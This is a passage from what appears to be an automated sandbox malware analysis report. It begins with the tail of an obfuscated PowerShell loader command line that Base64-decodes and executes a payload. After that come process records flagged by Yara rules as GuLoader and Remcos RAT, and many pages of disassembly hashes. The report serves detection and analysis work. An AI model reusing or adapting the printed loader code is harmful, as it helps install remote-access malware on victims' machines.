St.a$SagsbgHeterLLin,aOOverlB Ac,tA MonuLFork :RaaensIps,lEaburacCha,uE.amboS Svi,hYtt oeAu okrHyoep= Khar(SlabutReconedialesS rjtTAccen- SlenPMins A,njurtBuskvHDemor syla$H.nritStil.i DiviL Sel SImpasT orbeAFamleNLa,tidOsteesSlittK CyphO Dec nTilflTColorrFlde oPushelDangllAposteKont Nmetag)Mith ');while (!$Secesher) {Complimentable (Demissioner 'Besho$W ankgToolmlIndenoDingibStjmaa PosslKrmme: BldgLMappegUr.tie skvamS xoliSteepdGadenlUncateLal erDiagrsArbej=S.nka$ReduptReletrPreteuKe.neeRredd ') ;Complimentable $Bortkaldenes;Complimentable (Demissioner 'PositS ConstBaandaA ronrPlummtmax l-RadicSRebuclH,tideNondaeF.odepF rbi Parag4Perki ');Complimentable (Demissioner 'Vates$CentegtokonlT gneoMartibIndkbaRededlC lla:RegniSSt,ike UdskcSmidieForhasHarboh undeeExpatrRetou= Remu(,luviTKonsteRedidsHypert E.ns-FodtuPSpinaaAfgiftAutomhUnwil Skel $ouchiTFedtei Ko.llSoillsLselatGe iraHolden UdbldForsesP lotkFo nuo ba ln Eks t HjerrLarkio RentlKvajplIn uleSpec nF rtl)Age s ') ;Complimentable (Demissioner 'Unvex$UnweagDis elemissoSemipbb odtaSvinglPostd:ThousNMick yDgl nsPlombeMacra= Re r$ Sno.gGrumblUnevao LeucbPartiaRe.mplP ras:C lfoS HalvtlivssmSelvraKo,ypgAarsktLittleChambrDansknPart,e Fr.p+Frems+Balde% luor$OspheRPiggieind rkArecarS bbre For.e.ersurFolloeAmberd usmoeNonres Tndi.ShoemcRew,ro MultuQua,en m,krtFi,eo ') ;$Dermoid108=$Rekreeredes[$Nyse];}$hanerne=327149;$Whitewashes=31726;Complimentable (Demissioner 'Godke$ Mudrg ChanlSklveoAgorabI posaKontalKathi: ArmvTNicksyHel.as BrilkSu syl Cas aRedamn Po gdtorqusexophk BranoHurtirDiapatTovreemalacnKo keeVandf Rente=K,ydr UnmaGOgcoce KonttTelea-v yagC Preeo PennnMur etTrumbeAntipnBour tBog.r .well$S iseTHjtidiKo salBrdtesParcet SkaraMeta nAl ebd innosImprekGymnaounfe.nStanstSomatra,itho GenmlSereal D,caePbelanpentr ');Complimentable (Demissioner 'Helio$fontegRuskvlEul goTr,ldbShmooaAboitlA ive:SkmteAL vitfDataovBridaiunshrsTi,skeLedersUrocy F rgl=Strit Kna,e[D mkiSBjensyElaeosDecrot K,ype B.gsm Defi.An.itCPlejeoRi.honIntervSminkeMet,lrFejlktFrken]Barbo:Symph:BobslFsygepr InduoSkummmUnel BChr saAltersA.reme.asel6Vej n4PresuS anectGli.trNutidicho en Halvg We d(.nder$Nonc T LgdeyT.igosPeltikZoonulTheataResu,nAlarmd DeodsStrudkUforkobasisrDisset UforeM,tronLu,eaeIncon)Blunt ');Complimentable (Demissioner ',iern$UdbldgAf nnl zygoo BespbLave,ashal.lstrue:Pe sohKlbenyRevispTranse Profr LumidMispoeOrdk.l PrstiMallec Grapas.gnecTankeyHausf Bo sa=Garr, Plan[VarmeSandenyAnthrsCherrtS ovbe ChesmBulkl.P.ojeTBalloeT iloxGavltt Rh.x.Wi dbEFermenfljtecAabenom.rryd mneiPodopnDodecg,kole]Sidew:Carbi:UnwebA s apSNieceCDilatIUngtjIStorm.UdfreGDogmaeSyntatSuli.SGla.ftMondorEmbaciSegganApertgRommy(Fruit$ DemoA Car,fSpectvKommuiMicrosForeseAr.easNedto)Be.ud ');Complimentable (Demissioner 'U.ere$ Afskg AvlslUnmanoK rtebElandaClanslPha,t:Poly,EBullisStigmt brikhEx rieBalanshaeani Vej,oVilk,gAnnlirA.equa D gep AfbahAptycyAgerb=Arbit$ KanehLeucoy Loo pEuroceRawbor BuksdCryste vehilMargiiBrnebcunentaMomencDafniyMac.o. eners Fuldu ankebStar sIchortTek tr Solsi ,rcin eohygForby(Elect$CensohTor kaShadfnScapheSlatirBriefnZ,dkueMisap,Mine,$StortWK lethSt rei HachtinteleBlindw InteaStyrbs F,erhBilggeAarsis Stud)Eng n ');Complimentable $Esthesiography;"
                                              Imagebase:0x8e0000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2778199563.0000000008060000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2759953043.0000000005324000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.2778451648.00000000088EE000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:5
                                              Start time:03:57:29
                                              Start date:30/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6d64d0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:8
                                              Start time:03:57:49
                                              Start date:30/09/2024
                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\syswow64\msiexec.exe"
                                              Imagebase:0x4a0000
                                              File size:59'904 bytes
                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2738469481.00000000064E1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:12
                                              Start time:03:58:09
                                              Start date:30/09/2024
                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                              Imagebase:0x4a0000
                                              File size:59'904 bytes
                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Executed Functions

                                                Function 00007FF8486DA09A Relevance: .5, Instructions: 547COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2384621619.00007FF8486D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8486D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ff8486d0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5ff1e715e1bc8c7e0c3a0e350dc4911b6cca5f701f5291c10f2ee743e4b8118a
                                                • Instruction ID: aa6923d483a16a13fd84523e9383dfe7b02796cce195b73405fa8d9a4280ecfc
                                                • Opcode Fuzzy Hash: 5ff1e715e1bc8c7e0c3a0e350dc4911b6cca5f701f5291c10f2ee743e4b8118a
                                                • Instruction Fuzzy Hash: 97022732D0E7C54FE796AB2848592747BE1EF86661F0900FEC049CB1D3DE29AC86C756
                                                Function 00007FF84860B276 Relevance: .5, Instructions: 474COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2384040921.00007FF848600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848600000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ff848600000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b2010ae57f49591e532d231d9ed91da98c831fce4c5781d975b657e231196ec0
                                                • Instruction ID: 3759110fce51523fa246fa802e7e9a21f1e01b1daa1f2213dac6b3d1eebbcd77
                                                • Opcode Fuzzy Hash: b2010ae57f49591e532d231d9ed91da98c831fce4c5781d975b657e231196ec0
                                                • Instruction Fuzzy Hash: 10F1C63090CA8D8FEBA9EF28C8557E937D1FF55350F04826EE84DC7295DB34A9418B86
                                                Function 00007FF84860C022 Relevance: .5, Instructions: 460COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2384040921.00007FF848600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848600000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ff848600000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3dd3d3a883e60e4a02b2ea317af96d1e974044286176bede4cb5ed6c8cfe1091
                                                • Instruction ID: 7ee2384999be5313b4adbed21bddaa7ab31fa8e360cff125e0ba15ef32fe29cc
                                                • Opcode Fuzzy Hash: 3dd3d3a883e60e4a02b2ea317af96d1e974044286176bede4cb5ed6c8cfe1091
                                                • Instruction Fuzzy Hash: 33E1E33090DA8D8FEBA8EF28C85A7E977D1FB55350F14426EE84DC7291DF34A9408B85
                                                Function 00007FF8486D7276 Relevance: .9, Instructions: 890COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2384621619.00007FF8486D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8486D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ff8486d0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4e79980162183e7b145553ed5fef2c8df27e98b8473b1ff0b31126b9f784e900
                                                • Instruction ID: 700d8da075d9430a090c8f02af79d74de690f30069610b23d2beed65f0e9ff0f
                                                • Opcode Fuzzy Hash: 4e79980162183e7b145553ed5fef2c8df27e98b8473b1ff0b31126b9f784e900
                                                • Instruction Fuzzy Hash: 92420431D0EA8A9FE7D6A63848195747BE1EF56390F0901FAC04DCB193DB29AC06CB57
                                                Function 00007FF84860E980 Relevance: .7, Instructions: 675COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2384040921.00007FF848600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848600000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ff848600000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bd0db98ff1f21b0e78eb7e9a9713b508a58a12f07f396033248a09720c411440
                                                • Instruction ID: a254bc513ab71ba27d783b70e0a61b1cc1bda40b91403b604a38d7886f3544ac
                                                • Opcode Fuzzy Hash: bd0db98ff1f21b0e78eb7e9a9713b508a58a12f07f396033248a09720c411440
                                                • Instruction Fuzzy Hash: 01F17F30A0CA5D8FDF88EF5CC495AA97BE1FFA8350F14416AE409D7296DB34E841CB85
                                                Function 00007FF8486D8CBD Relevance: .5, Instructions: 483COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2384621619.00007FF8486D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8486D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ff8486d0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d2da347b4203a16e820ddab202fcae24c5af419e6be0e6c16834d9294820a665
                                                • Instruction ID: fe19758bba5cd80f4a1632b042c9793edabf7c150e1609b14fc96922517b65cf
                                                • Opcode Fuzzy Hash: d2da347b4203a16e820ddab202fcae24c5af419e6be0e6c16834d9294820a665
                                                • Instruction Fuzzy Hash: 1FF13732E0EA854FE799AB2858591787BE1EF95760F1805FEC04DC71C3DF28AC498B46
                                                Function 00007FF8486D541D Relevance: .4, Instructions: 376COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2384621619.00007FF8486D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8486D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ff8486d0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8bc34355b1469bd7fe7ff158c565a8842c23ac6b137dc4c33510b410f15d6599
                                                • Instruction ID: 22a2e892f62a905537e1e5f6d1d9af40fbe0b5b4a76b1571dfb159c8ed36f1e7
                                                • Opcode Fuzzy Hash: 8bc34355b1469bd7fe7ff158c565a8842c23ac6b137dc4c33510b410f15d6599
                                                • Instruction Fuzzy Hash: 7AB11331E0EE8A4FE7D6AB28581C9B57BE2EF553A0F4801FBC00DC75A3DA199C058B55
                                                Function 00007FF8486D9457 Relevance: .3, Instructions: 346COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2384621619.00007FF8486D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8486D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ff8486d0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: eacab051e663b3a92dee14622e49a4e213c6cf5fe387198d28c1310544322aa0
                                                • Instruction ID: fbb91af242c48f1bd85452ac8b3810398038965fcd899f8d04cbfd9421c92977
                                                • Opcode Fuzzy Hash: eacab051e663b3a92dee14622e49a4e213c6cf5fe387198d28c1310544322aa0
                                                • Instruction Fuzzy Hash: A6A12331A0EA894FEBD7AE2858586B47BE1EF56250F0801FBC44DCB1D3DE19AC06C785
                                                Function 00007FF84860BC36 Relevance: .3, Instructions: 331COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2384040921.00007FF848600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848600000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ff848600000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d88d01ad685255e667d82561f858811d2146ca59c7bcfc836b3bac86120b3722
                                                • Instruction ID: e6353d015e07d1ba71a4b90335bfdee4d287511c4e2cd0ca4fc758176d17766b
                                                • Opcode Fuzzy Hash: d88d01ad685255e667d82561f858811d2146ca59c7bcfc836b3bac86120b3722
                                                • Instruction Fuzzy Hash: F0B1B53090CA8D4FDBA8EF28D8557E93BE1EF55350F04826AE84DC7292DF3499458B86
                                                Function 00007FF8486D7641 Relevance: .3, Instructions: 310COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2384621619.00007FF8486D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8486D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ff8486d0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5ee54835b9970ddda3ff4c8afdfb7634e3c68f8a6da8f6a78d41a995d087b1ea
                                                • Instruction ID: 55f58445c21946597b529bc6253c37b43efad43eeea5d4be3ca4d663ebf2023b
                                                • Opcode Fuzzy Hash: 5ee54835b9970ddda3ff4c8afdfb7634e3c68f8a6da8f6a78d41a995d087b1ea
                                                • Instruction Fuzzy Hash: 98911431D0EA8A5FE7D6A63848195747BE1EF52390F1905FBC04CCB193EB29AC05CB86
                                                Function 00007FF8486D4509 Relevance: .3, Instructions: 255COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2384621619.00007FF8486D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8486D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ff8486d0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ca8c94504243d32f05e1f6c646a9b1d8307a7c31e1d3c04a141838f7d311f174
                                                • Instruction ID: 540c4b647b88726ad23be01c4555c6badffa3d758e6b77ac114ca57dfb08630e
                                                • Opcode Fuzzy Hash: ca8c94504243d32f05e1f6c646a9b1d8307a7c31e1d3c04a141838f7d311f174
                                                • Instruction Fuzzy Hash: 23712821E1EE864FF7DAAA2C145967933D1EF41290F5801BAD80EC31D3EF19EC05464A
                                                Function 00007FF8486D9527 Relevance: .2, Instructions: 226COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2384621619.00007FF8486D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8486D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ff8486d0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 24aaa8860118bbb4f2303eaef2c338d246b70b6f41b3df418c0c60ce1fc87acd
                                                • Instruction ID: a4dad311cffc04eb225cfa61b390f30d21651028ba45d310bec852325a71cf88
                                                • Opcode Fuzzy Hash: 24aaa8860118bbb4f2303eaef2c338d246b70b6f41b3df418c0c60ce1fc87acd
                                                • Instruction Fuzzy Hash: 6561F131A0EBC98FEB96EE2854585757BE1EF16354F0801FEC049CB193CA299C49CB46
                                                Function 00007FF8486D9E2A Relevance: .2, Instructions: 225COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2384621619.00007FF8486D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8486D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ff8486d0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0de85644988adedde8434a26f74b0b27297f198df6691e5ab5520e813572d573
                                                • Instruction ID: dcc48868fc94145d009d6b283de09c7e6655cb9160ed20a545db362892dcf47c
                                                • Opcode Fuzzy Hash: 0de85644988adedde8434a26f74b0b27297f198df6691e5ab5520e813572d573
                                                • Instruction Fuzzy Hash: F161C131A0EBC98FDB97AB3858595A47FF0EF56250F0901FBC049CB0A3DA199C49C766
                                                Function 00007FF8486D9661 Relevance: .1, Instructions: 127COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2384621619.00007FF8486D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8486D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ff8486d0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 71b10890521cf3f096b38bee4cf30a65a5108fcbc451d8c0f56b9a7e26e42ef8
                                                • Instruction ID: d7f9139ed63c86f15505a210db602a5087de48537d927c2520ff9821c4b24df1
                                                • Opcode Fuzzy Hash: 71b10890521cf3f096b38bee4cf30a65a5108fcbc451d8c0f56b9a7e26e42ef8
                                                • Instruction Fuzzy Hash: 4C41D031A0EBC98FEB93AE3858585647FE1EF16250F0900FBC448CB0E3DA289C4AC715
                                                Function 00007FF8486D7A28 Relevance: .1, Instructions: 127COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2384621619.00007FF8486D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8486D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ff8486d0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0228a8a59fffc2c658fe014b01c7c9eefcfe6e3e91a59ec3ea1c8b5b113a16d0
                                                • Instruction ID: 60b4ee95e1c8e9e4c854d177112c246bd08273b13d4d4a35f099d4233779ffc9
                                                • Opcode Fuzzy Hash: 0228a8a59fffc2c658fe014b01c7c9eefcfe6e3e91a59ec3ea1c8b5b113a16d0
                                                • Instruction Fuzzy Hash: 0841DF21E0EACA5FE7A6AB2848685707BE1EF66250F0D00FBC44CCB1D3DB196C09C756
                                                Function 00007FF8486D5542 Relevance: .1, Instructions: 108COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2384621619.00007FF8486D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8486D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ff8486d0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2d604d0a637dccbdc9b03030b3ffdf86eb203189012f61929fef52d3df29876b
                                                • Instruction ID: 85232cf22649b2b4e6c3b76fff52b8f903c0d6fafd3562ece6cd8deea0e509a9
                                                • Opcode Fuzzy Hash: 2d604d0a637dccbdc9b03030b3ffdf86eb203189012f61929fef52d3df29876b
                                                • Instruction Fuzzy Hash: AD31C322E1EEC75FF3EBA628181D57966D2EF057A0F4801BAD41DC35D3EE1C6804465A
                                                Function 00007FF8486D74BC Relevance: .1, Instructions: 102COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2384621619.00007FF8486D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8486D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ff8486d0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 201d04cfd041d1d857a7ac8bc785dbe887220c4400c9d312502a1ba17e414528
                                                • Instruction ID: b15f59abf6144b727e03b456f3e0321b427f48cfa697711a05c7696e4c027125
                                                • Opcode Fuzzy Hash: 201d04cfd041d1d857a7ac8bc785dbe887220c4400c9d312502a1ba17e414528
                                                • Instruction Fuzzy Hash: C2210632B0CA094EF7A6A61C78062F977C0EFC5275F140277D04EC3582EF15E8168687
                                                Function 00007FF8486D4604 Relevance: .1, Instructions: 97COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2384621619.00007FF8486D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8486D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ff8486d0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7297a2c1845d0ae390dfe0f981ca1c99818f1d20556c17d7606cad0ba3b2b400
                                                • Instruction ID: 62b333afdadc1dba645670ebe8a8e6e424cb6ebb21ec7315f0f9ac3608ce655d
                                                • Opcode Fuzzy Hash: 7297a2c1845d0ae390dfe0f981ca1c99818f1d20556c17d7606cad0ba3b2b400
                                                • Instruction Fuzzy Hash: 05213721E1EECA4FF3D9A72C140957862D2EF817A0F5901BAE80EC31D3EE19EC05460A
                                                Function 00007FF84860B734 Relevance: .1, Instructions: 92COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2384040921.00007FF848600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848600000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ff848600000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 92cd045f99396b4aceaad9b5ace82eed02ff24fa268870a28a8d3db1d453d7ea
                                                • Instruction ID: 7680a2d9952a947e16af1f703bea5b1c9178f065eaa345b0fc06de66865e4cf7
                                                • Opcode Fuzzy Hash: 92cd045f99396b4aceaad9b5ace82eed02ff24fa268870a28a8d3db1d453d7ea
                                                • Instruction Fuzzy Hash: 9931133081964E8EFBF4EF14CC1ABFA3298FF42398F404539D44D86092EB786985CB19
                                                Function 00007FF8486D19AF Relevance: .1, Instructions: 80COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2384621619.00007FF8486D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8486D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ff8486d0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 945727b5debf80ece40cfeb1f590ea3f1dd837524c1d8c05b11845a5dde8db60
                                                • Instruction ID: d352c01e589045e324c8ab1f178c5e641e2849b42b94300573538cdd2612606c
                                                • Opcode Fuzzy Hash: 945727b5debf80ece40cfeb1f590ea3f1dd837524c1d8c05b11845a5dde8db60
                                                • Instruction Fuzzy Hash: 7421F622E0FAC69FF395A63C2819175ABE1EF56690B0905FBD048CB1D7DD1C4C464B1A
                                                Function 00007FF8486D9C89 Relevance: .1, Instructions: 64COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2384621619.00007FF8486D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8486D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ff8486d0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 92386178e70115638d52d099521f52408daeddeb9748784e39c0b5f8a70d2e37
                                                • Instruction ID: 76bf0b60216a5ea11f5089c54180eb4d909d8be8078947cc47aa29477a6957fa
                                                • Opcode Fuzzy Hash: 92386178e70115638d52d099521f52408daeddeb9748784e39c0b5f8a70d2e37
                                                • Instruction Fuzzy Hash: 6411D232E0E7C58FE756EB28585A2A8BBE0FF02360F0401FEC089C7093DB292C458B45
                                                Function 00007FF8486041E5 Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2384040921.00007FF848600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848600000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ff848600000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 348d5fb5261f51f812e1f49a056d31a35d386422633fb1efa08e0a84813b5c5b
                                                • Instruction ID: 50ad29a83ab1ac795a640d80049de15c03883533cebc9a4a2000a2ab708a5117
                                                • Opcode Fuzzy Hash: 348d5fb5261f51f812e1f49a056d31a35d386422633fb1efa08e0a84813b5c5b
                                                • Instruction Fuzzy Hash: 2501447115CB0C4FD748EF0CE451AA9B7E0FB95364F10056DE58AC3665D626E882CB45

                                                Executed Functions

                                                Function 029FF320 Relevance: .3, Instructions: 281COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2736930652.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_29f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c8787a5856f295cfdee29de31bf84fa46f48f59928bf7b851b32ef484d43b4c3
                                                • Instruction ID: 997f93e6463f34b37d612859ecb752ce5b1af02ea57a62ec89324c04271c2ed0
                                                • Opcode Fuzzy Hash: c8787a5856f295cfdee29de31bf84fa46f48f59928bf7b851b32ef484d43b4c3
                                                • Instruction Fuzzy Hash: 24B15170E002098FDF90CFA9D9857ADBBF6BF88318F148129D519E7694EB749845CF81
                                                Function 029FFBF0 Relevance: .3, Instructions: 266COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2736930652.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_29f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3d1b22465ae0985a977175de92af202fa088703279cc83573ed5649c2ce0866c
                                                • Instruction ID: 92c3a4badb0bee8739aef52b721814028bd0b7f1598598fa7349e4120eaeef24
                                                • Opcode Fuzzy Hash: 3d1b22465ae0985a977175de92af202fa088703279cc83573ed5649c2ce0866c
                                                • Instruction Fuzzy Hash: 35B18E71E0020ACFDF90CFA8D8857DDBBF6AF88718F148129D919E7694EB749845CB81
                                                Function 06DE5D48 Relevance: 26.0, Strings: 20, Instructions: 1040COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2773174188.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6de0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (f8l$(f8l$(f8l$(f8l$(f8l$(f8l$(f8l$(f8l$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$tPcq$tPcq$x.)k$-)k
                                                • API String ID: 0-2426291195
                                                • Opcode ID: b8788e9379e7f7a3c3fc51d5f9a83054ae20d0fcb9f38da76ffbe9262009e2a3
                                                • Instruction ID: 551242f6c70a8d88d363b28dc929d66e8d42ed8b056c175b2f019c2775b2f3f4
